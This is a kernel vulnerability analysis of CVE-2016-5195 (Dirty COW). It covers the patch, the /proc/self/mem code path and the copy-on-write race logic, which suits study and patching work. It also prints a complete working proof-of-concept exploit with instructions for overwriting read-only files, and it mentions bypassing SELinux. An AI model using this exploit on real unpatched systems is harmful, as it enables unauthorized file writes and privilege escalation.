CVE-2016-5195

You people just have to make some big news at the end of every year...

Linux kernel versions >= 2.6.22 (released in 2007) are affected; Android is affected as well.

A race condition exists in the way the Linux kernel's memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user can exploit this flaw to gain write access to otherwise read-only memory mappings, which can further lead to privilege escalation.

This bug touches quite a few areas, including page-fault handling, copy-on-write (COW), race conditions and paged memory management, so there is a lot of material to go through.

Below is a brief walk-through of the code path on Android.

Patch

+static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
+{
+ return pte_write(pte) ||
+ ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
+}
+
static struct page *follow_page_pte(struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd, unsigned int flags)
{
@@ -95,7 +105,7 @@ retry:
}
if ((flags & FOLL_NUMA) && pte_protnone(pte))
goto no_page;
- if ((flags & FOLL_WRITE) && !pte_write(pte)) {
+ if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags)) {
pte_unmap_unlock(ptep, ptl);
return NULL;
}
@@ -412,7 +422,7 @@ static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
* reCOWed by userspace write).
*/
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
- *flags &= ~FOLL_WRITE;
+ *flags |= FOLL_COW;
return 0;
}

The patch introduces a FOLL_COW flag: instead of dropping FOLL_WRITE after a successful COW fault, faultin_page now sets FOLL_COW, and follow_page_pte only accepts a non-writable PTE for a forced write when FOLL_COW is set and the PTE is dirty.
The patched function follow_page_pte corresponds to follow_page in the Android kernel. Tracing its references gives the following call chain:


follow_page <-
__get_user_pages <-
get_user_pages <-
__access_remote_vm <-
access_remote_vm <-
mem_rw <-
mem_write <-
proc_mem_operations

static const struct file_operations proc_mem_operations = {
.llseek = mem_lseek,
.read = mem_read,
.write = mem_write,
.open = mem_open,
.release = mem_release,
};

This structure lives in fs/proc/base.c and provides the file operations (read, write, etc.) for /proc/<pid>/mem.
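As a quick illustration of this entry point, here is a minimal sketch (not part of the original analysis, error handling kept to a minimum): a process opens its own /proc/self/mem, lseek()s to a virtual address and write()s to it, and the data travels through mem_write -> mem_rw -> access_remote_vm -> __get_user_pages, exactly the chain listed above.

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    char buf[] = "hello";                      /* target memory inside our own process */
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0) { perror("open"); return 1; }

    /* Seek to the virtual address of buf; the write() below enters the kernel
     * through mem_write() and ends up in __get_user_pages(). */
    lseek(fd, (off_t)(unsigned long)buf, SEEK_SET);
    if (write(fd, "HELLO", 5) != 5)
        perror("write");

    printf("%s\n", buf);                       /* prints "HELLO" */
    close(fd);
    return 0;
}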

POC

#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
    char *str = (char *)arg;
    int i, c = 0;
    (void)str; /* unused */

    for (i = 0; i < 100000000; i++)
    {
        /* Tell the kernel the mapping is not needed, so the COWed page gets dropped. */
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n\n", c);
    return NULL;
}

void *procselfmemThread(void *arg)
{
    char *str = (char *)arg;
    /* Writing through /proc/self/mem goes through get_user_pages() with FOLL_FORCE. */
    int f = open("/proc/self/mem", O_RDWR);
    int i, c = 0;

    for (i = 0; i < 100000000; i++) {
        lseek(f, (unsigned long)map, SEEK_SET);
        c += write(f, str, strlen(str));
    }
    printf("procselfmem %d\n\n", c);
    return NULL;
}

int main(int argc, char *argv[])
{
    if (argc < 3)
        return 1;

    pthread_t pth1, pth2;

    f = open(argv[1], O_RDONLY);
    fstat(f, &st);
    name = argv[1];
    /* Read-only, private mapping of the target file. */
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
    printf("mmap %p\n\n", map);

    pthread_create(&pth1, NULL, madviseThread, argv[1]);
    pthread_create(&pth2, NULL, procselfmemThread, argv[2]);
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);
    return 0;
}
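To try it, the usual dirtycow.github.io instructions apply (roughly): compile with gcc -pthread dirtyc0w.c -o dirtyc0w, create a file you can read but not write, and run ./dirtyc0w <that file> <string to write>; on a vulnerable kernel the string eventually shows up inside the read-only file once the two threads have raced for a while.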

Thread 2 (procselfmemThread):
This thread loops calling write() on /proc/self/mem to write to the mmap'd file data. Because the file is mapped with MAP_PRIVATE, a write is supposed to trigger a copy of the mapped region (copy-on-write), which guarantees that none of the modifications to this region are written back to the original file (a minimal demonstration of this normal behaviour follows below).
Combined with the trigger logic described later, this thread somehow triggers the bug so that the write ends up affecting the original data directly.
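As a minimal sketch of the normal MAP_PRIVATE behaviour (file name and contents here are just assumptions for illustration): a write into a private mapping only dirties the process-local COW copy and never reaches the underlying file.

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
    /* Assumes /tmp/demo.txt exists and holds at least 5 bytes. */
    int fd = open("/tmp/demo.txt", O_RDONLY);
    char *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (fd < 0 || p == MAP_FAILED) { perror("setup"); return 1; }

    memcpy(p, "XXXXX", 5);              /* triggers COW: the kernel gives us a private copy */

    char buf[6] = {0};
    pread(fd, buf, 5, 0);               /* re-read the file itself */
    printf("mapping: %.5s  file: %s\n", p, buf);   /* mapping changed, file unchanged */

    munmap(p, 4096);
    close(fd);
    return 0;
}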

Thread 1 (madviseThread):
This thread loops calling madvise(); the prototype is madvise(caddr_t addr, size_t len, int advice), described as follows (quoted from the net):
The main purpose of this function is to tell the kernel how the memory range addr ~ addr+len will be used next, so that the kernel can carry out further memory-management actions. With advice set to MADV_DONTNEED, the call tells the kernel that this range will no longer be used; the kernel frees the memory to save space and the corresponding page-table entries are cleared (see the sketch below).
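To see what MADV_DONTNEED means for the exploit, here is another small sketch (same assumed /tmp/demo.txt as above): once the private COW copy exists, MADV_DONTNEED throws it away and clears the PTE, and the next access repopulates the page straight from the file. That re-fault window is exactly what the two threads race over.

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
    int fd = open("/tmp/demo.txt", O_RDONLY);          /* assumed test file */
    char *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (fd < 0 || p == MAP_FAILED) { perror("setup"); return 1; }

    memcpy(p, "XXXXX", 5);                             /* create the private COW copy */
    printf("before DONTNEED: %.5s\n", p);              /* shows XXXXX */

    madvise(p, 4096, MADV_DONTNEED);                   /* drop the COW copy, clear the PTE */
    printf("after  DONTNEED: %.5s\n", p);              /* faults the page back in from the
                                                          file: the original bytes are back */
    munmap(p, 4096);
    close(fd);
    return 0;
}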

Vulnerability logic

write

static ssize_t mem_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos)

{

return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

static ssize_t mem_rw(struct file *file, char __user *buf,
size_t count, loff_t *ppos, int write)

{

...
this_len = access_remote_vm(mm, addr, page, this_len, write);
...
}

int access_remote_vm(struct mm_struct *mm, unsigned long addr,
void *buf, int len, int write)

{

return __access_remote_vm(NULL, mm, addr, buf, len, write);
}


static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
unsigned long addr, void *buf, int len, int write)
{
...
ret = get_user_pages(tsk, mm, addr, 1, write, 1, &page, &vma);
...
if (write) { // write = 1
copy_to_user_page(vma, page, addr, maddr + offset, buf, bytes); // memcpy the data into the page
set_page_dirty_lock(page); // dirty the page; when the CPU performs a write it sets PTE_DIRTY, marking the corresponding page as written, i.e. dirty
} else {
copy_from_user_page(vma, page, addr,
buf, maddr + offset, bytes);
}
...
}

int get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, int nr_pages, int write, int force,
struct page **pages, struct vm_area_struct **vmas)

{

int flags = FOLL_TOUCH;
if (pages)
flags |= FOLL_GET;
if (write) // write = 1
flags |= FOLL_WRITE;
if (force)
flags |= FOLL_FORCE;

return __get_user_pages(tsk, mm, start, nr_pages, flags, pages, vmas,
NULL);
}


/**
* __get_user_pages() - pin user pages in memory
* ...
* __get_user_pages walks a process's page tables and takes a reference to
* each struct page that each user address corresponds to at a given
* instant. That is, it takes the page that would be accessed if a user
* thread accesses the given user virtual address at that instant.
*
*/

int __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, int nr_pages, unsigned int gup_flags,
struct page **pages, struct vm_area_struct **vmas,
int *nonblocking)
{
...
// vm_flags = (VM_WRITE | VM_MAYWRITE)
vm_flags = (gup_flags & FOLL_WRITE) ?
(VM_WRITE | VM_MAYWRITE) : (VM_READ | VM_MAYREAD);
// vm_flags = VM_WRITE
vm_flags &= (gup_flags & FOLL_FORCE) ?
(VM_MAYREAD | VM_MAYWRITE) : (VM_READ | VM_WRITE);
...
do {
...
do {
...
while (!(page = follow_page(vma, start, foll_flags))) { // look up the page for this address
int ret;
unsigned int fault_flags = 0;
...
// 3. pass
if (foll_flags & FOLL_WRITE)
fault_flags |= FAULT_FLAG_WRITE;
...
ret = handle_mm_fault(mm, vma, start, fault_flags); // called when the lookup fails, to fault the page in
...
// If the lookup failed because the mapping lacks write permission, drop FOLL_WRITE from the flags, so that subsequent lookups no longer require the mapping to be writable.
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
foll_flags &= ~FOLL_WRITE;
...
}

This while loop is where the vulnerability is triggered.

follow_page

/**
* follow_page - look up a page descriptor from a user-virtual address
* Returns the mapped (struct page *), %NULL if no mapping exists, or
* an error pointer if there is a mapping to something not represented
* by a page descriptor (see also vm_normal_page()).
*
* Looks up the kernel page backing a user virtual address; returns NULL if no page is mapped.
*/


struct page *follow_page(struct vm_area_struct *vma, unsigned long address,
unsigned int flags)

{

...

// Check whether the PTE is valid (present).
// When the page is not in memory at all, the PTE is not present either.
if (!pte_present(pte)) // 1. 3.
goto no_page;

// We are looking for a writable page, but the PTE has no write permission.
if ((flags & FOLL_WRITE) && !pte_write(pte)) // 2.
goto unlock;

// Use the page frame number stored in the PTE to find the corresponding struct page.
page = vm_normal_page(vma, address, pte); // 4.
...
unlock:
pte_unmap_unlock(ptep, ptl);
out:
return page;
...
no_page:
pte_unmap_unlock(ptep, ptl);
if (!pte_none(pte))
return page;
...
}

handle_mm_fault


/*
* handle_mm_fault() is invoked to allocate a new page frame for the faulting address
*/


int handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, unsigned int flags)

{

...
return handle_pte_fault(mm, vma, address, pte, pmd, flags);
}

int handle_pte_fault(struct mm_struct *mm,
struct vm_area_struct *vma, unsigned long address,
pte_t *pte, pmd_t *pmd, unsigned int flags)

{

pte_t entry;
spinlock_t *ptl;
entry = *pte;
if (!pte_present(entry)) { // the page is not present in main memory
if (pte_none(entry)) { // the PTE is empty (0): the process has never accessed this page
if (vma->vm_ops) { // if both vm_ops and its fault handler are set, this is a file-backed mapping
if (likely(vma->vm_ops->fault))
return do_linear_fault(mm, vma, address,
pte, pmd, flags, entry);
}
// otherwise allocate an anonymous page
return do_anonymous_page(mm, vma, address, pte, pmd, flags);
}
// a non-linear file mapping that has been swapped out
if (pte_file(entry))
return do_nonlinear_fault(mm, vma, address,
pte, pmd, flags, entry);

// the page is not in main memory, but the PTE holds swap information: the page was swapped out by the kernel and has to be swapped back in
return do_swap_page(mm, vma, address,
pte, pmd, flags, entry);
}

ptl = pte_lockptr(mm, pmd);
spin_lock(ptl);
if (unlikely(!pte_same(*pte, entry)))
goto unlock;
if (flags & FAULT_FLAG_WRITE) { // the fault was triggered by a write access; this flag gets set after follow_page fails
if (!pte_write(entry)) // the corresponding page is not writable
return do_wp_page(mm, vma, address, pte, pmd, ptl, entry); // copy-on-write has to be done here; afterwards, accesses to this virtual address hit the copy of the original data

entry = pte_mkdirty(entry);
}
// no copy-on-write here
entry = pte_mkyoung(entry);
if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
update_mmu_cache(vma, address, pte);
}
...
unlock:
pte_unmap_unlock(pte, ptl);
return 0;
}

// do_linear_fault -> __do_fault -> vma->vm_ops->fault -> filemap_fault -> return ret | VM_FAULT_LOCKED
static int do_linear_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pte_t *page_table, pmd_t *pmd,
unsigned int flags, pte_t orig_pte)

{

pgoff_t pgoff = (((address & PAGE_MASK)
- vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff;
// if page_table was previously used to set up a temporary kernel mapping, release that mapping
pte_unmap(page_table);
return __do_fault(mm, vma, address, pmd, pgoff, flags, orig_pte);
}

static int __do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd,
pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
...

// call the registered fault handler to allocate a new page and make sure the required file data is read into the mapped page
ret = vma->vm_ops->fault(vma, &vmf);
...
// 1. cow, 3. pass
if (flags & FAULT_FLAG_WRITE) { // write access
if (!(vma->vm_flags & VM_SHARED)) { // private mapping (MAP_PRIVATE): a copy has to be created for copy-on-write
page = cow_page;
anon = 1; // mark it as an anonymous mapping
copy_user_highpage(page, vmf.page, address, vma); // create the new (copied) page
__SetPageUptodate(page);
} else {
...
//
if (likely(pte_same(*page_table, orig_pte))) {
flush_icache_page(vma, page);
entry = mk_pte(page, vma->vm_page_prot); // build a PTE for the new page
// 3. pass
if (flags & FAULT_FLAG_WRITE) // mark this page writable so that other paths do not trigger COW as well
entry = maybe_mkwrite(pte_mkdirty(entry), vma);
...
set_pte_at(mm, address, page_table, entry); // install the PTE into the page table
...
}

static inline pte_t maybe_mkwrite(pte_t pte, struct vm_area_struct *vma)
{

if (likely(vma->vm_flags & VM_WRITE))
pte = pte_mkwrite(pte);
return pte;
}

// page-fault handlers defined by ext4
static const struct vm_operations_struct ext4_file_vm_ops = {
.fault = filemap_fault,
.page_mkwrite = ext4_page_mkwrite,
};

/**
* filemap_fault - read in file data for page fault handling
* ...
* filemap_fault() is invoked via the vma operations vector for a
* mapped memory region to read in file data during a page fault.
* ...
*/


int filemap_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
{

...

// The first thing this function does is check whether the accessed offset (relative to the file) is beyond the file size;
// if it is, it returns VM_FAULT_SIGBUS, which causes a SIGBUS signal to be delivered to the process.
size = (i_size_read(inode) + PAGE_CACHE_SIZE - 1) >> PAGE_CACHE_SHIFT;
if (offset >= size)
return VM_FAULT_SIGBUS;

// find_get_page() quickly looks up the page cached for this file offset (inode) in the page cache.
page = find_get_page(mapping, offset);
...
vmf->page = page;
return ret | VM_FAULT_LOCKED;
...
}

static int do_wp_page(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pte_t *page_table, pmd_t *pmd,
spinlock_t *ptl, pte_t orig_pte)

__releases(ptl)
{

...
/*
// get the shared page
old_page = vm_normal_page(vma, address, orig_pte);
if (!old_page) { // failed to get the shared page
// if the vma's mapping is shared and writable anyway, jump to reuse and use the page behind orig_pte directly
if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
(VM_WRITE|VM_SHARED))
goto reuse;
// otherwise jump to gotten and allocate a page
goto gotten;
}
*/

// 2.
if (PageAnon(old_page) && !PageKsm(old_page)) {
...
// The kernel detects that the COW was already carried out during the earlier fault handling, so instead of doing another COW it simply reuses the page obtained by that COW.
if (reuse_swap_page(old_page)) {
/*
* The page is all ours. Move it to our anon_vma so
* the rmap code will not search our parent or siblings.
* Protected against the rmap code by the page lock.
*/

page_move_anon_rmap(old_page, vma, address);
unlock_page(old_page);
goto reuse;
}
}
...
reuse:
flush_cache_page(vma, address, pte_pfn(orig_pte));
entry = pte_mkyoung(orig_pte);
entry = maybe_mkwrite(pte_mkdirty(entry), vma); // mark the page dirty
if (ptep_set_access_flags(vma, address, page_table, entry,1))
update_mmu_cache(vma, address, page_table);
pte_unmap_unlock(page_table, ptl);
ret |= VM_FAULT_WRITE;
...
return ret;
/*
gotten:
pte_unmap_unlock(page_table, ptl);

if (unlikely(anon_vma_prepare(vma)))
goto oom;

if (is_zero_pfn(pte_pfn(orig_pte))) { // allocate a zeroed page
new_page = alloc_zeroed_user_highpage_movable(vma, address);
if (!new_page)
goto oom;
} else {
new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address); // allocate a regular (non-zero) page
if (!new_page)
goto oom;
cow_user_page(new_page, old_page, address, vma); // copy the data from old_page into new_page
}
...
new_page = old_page;
ret |= VM_FAULT_WRITE;
}
return ret;
*/

...
}

Trigger logic

The bug is triggered by the while loop in __get_user_pages; in total the loop runs four times, with the following call flows:

1.

follow_page() // (!pte_present(pte)) && (!pte_none(pte)) holds, returns NULL
enter the loop:
handle_mm_fault
-> __handle_mm_fault
-> handle_pte_fault // (!pte_present(entry)) && (pte_none(entry)) && (vma->vm_ops) holds
-> do_linear_fault
-> __do_fault
-> vma->vm_ops->fault(vma, &vmf) // filemap_fault() return VM_FAULT_LOCKED
-> copy_user_highpage // cow
-> maybe_mkwrite(pte_mkdirty(entry), vma) // mark the page dirty, RO
return VM_FAULT_LOCKED

2.

follow_page() // ((flags & FOLL_WRITE) && !pte_write(pte)) holds, returns NULL
enter the loop:
handle_mm_fault
-> __handle_mm_fault
-> handle_pte_fault // (flags & FAULT_FLAG_WRITE) && (!pte_write(entry)) holds
-> do_wp_page()
-> PageAnon() // this is CoWed page already
-> reuse_swap_page(old_page)
-> maybe_mkwrite(pte_mkdirty(entry), vma) // mark the page dirty, RO again
return VM_FAULT_WRITE

((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) holds, so the FOLL_WRITE flag is removed.

3.
When get_user_pages calls follow_page for the third time, the madvise thread may meanwhile have called madvise(map, MADV_DONTNEED), telling the kernel that map will not be used again; the kernel then frees the pages backing map, so the lookup triggers another page fault.
By now FOLL_WRITE has already been cleared and fault_flags no longer carries FAULT_FLAG_WRITE,
so the lookup no longer requires the page to be writable, and no COW takes place.

cond_resched -> different thread will now unmap via madvise
follow_page() // (!pte_present(pte)) && (!pte_none(pte)) holds, returns NULL
enter the loop:
handle_mm_fault
-> __handle_mm_fault
-> handle_pte_fault // (!pte_present(entry)) && (pte_none(entry)) && (vma->vm_ops) holds
-> do_linear_fault
-> __do_fault
-> vma->vm_ops->fault(vma, &vmf) // filemap_fault() return VM_FAULT_LOCKED
-> // pass copy_user_highpage // cow
-> mk_pte(page, vma->vm_page_prot);

4.
The fourth call to follow_page succeeds and returns the corresponding page,
and the subsequent write is carried out on it and synced back to the read-only file, resulting in an unauthorized write.

follow_page()
-> (!pte_present(pte)) // pass
-> ((flags & FOLL_WRITE) && !pte_write(pte)) // FOLL_WRITE has been dropped, so this check passes too
-> page = vm_normal_page(vma, address, pte); // return page;

Expressed as pseudocode, the four iterations are:

/**
* 1.
* follow_page: (!pte_present(pte)) && (!pte_none(pte)) holds, NULL is returned, enter the loop
*/

while (!(page = follow_page()))
{
handle_mm_fault()
{
__handle_mm_fault()
{
// handle_pte_fault: (!pte_present(entry)) && (pte_none(entry)) && (vma->vm_ops) holds
handle_pte_fault()
{
if ((!pte_present(entry)) && (pte_none(entry)) && (vma->vm_ops))
{ do_linear_fault()
{
__do_fault()
{
// call filemap_fault() return ret | VM_FAULT_LOCKED
ret = vma->vm_ops->fault(vma, &vmf);
// cow
copy_user_highpage();
// mark the page dirty, RO
maybe_mkwrite(pte_mkdirty(entry), vma)
// VM_FAULT_LOCKED
return ret;
}
}
}
}
}
}
}

/**
* 2.
* follow_page: ((flags & FOLL_WRITE) && !pte_write(pte)) holds, NULL is returned, enter the loop
*/

while (!(page = follow_page()))
{
handle_mm_fault()
{
__handle_mm_fault()
{
// (flags & FAULT_FLAG_WRITE) && (!pte_write(entry)) holds
handle_pte_fault()
{
do_wp_page()
{
// this is CoWed page already
if (PageAnon())
{
reuse_swap_page(old_page);
}
// mark the page dirty, RO again
maybe_mkwrite(pte_mkdirty(entry), vma);
return ret | VM_FAULT_WRITE
}
}
}
}

if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
{
foll_flags &= ~FOLL_WRITE;
}
}

/**
* 3.
* cond_resched -> different thread will now unmap via madvise
* follow_page: (!pte_present(pte)) && (!pte_none(pte)) holds, NULL is returned, enter the loop
*/

while (!(page = follow_page()))
{
handle_mm_fault()
{
__handle_mm_fault()
{
// (!pte_present(entry)) && (pte_none(entry)) && (vma->vm_ops) holds
handle_pte_fault()
{
do_linear_fault()
{
__do_fault()
{
// filemap_fault() return VM_FAULT_LOCKED
vma->vm_ops->fault(vma, &vmf);
// pass cow: copy_user_highpage
mk_pte(page, vma->vm_page_prot);
}
}
}
}
}

}

/**
* 4.
*/

follow_page()
{
// pass
if (!pte_present(pte))
{
return NULL;
}
// FOLL_WRITE has been dropped, so this check passes
if (((flags & FOLL_WRITE) && !pte_write(pte)))
{
return NULL;
}
// return page;
page = vm_normal_page(vma, address, pte);
return page;
}

Exploitation

  1. dirtycow.github.io
  2. SELinux has to be bypassed first.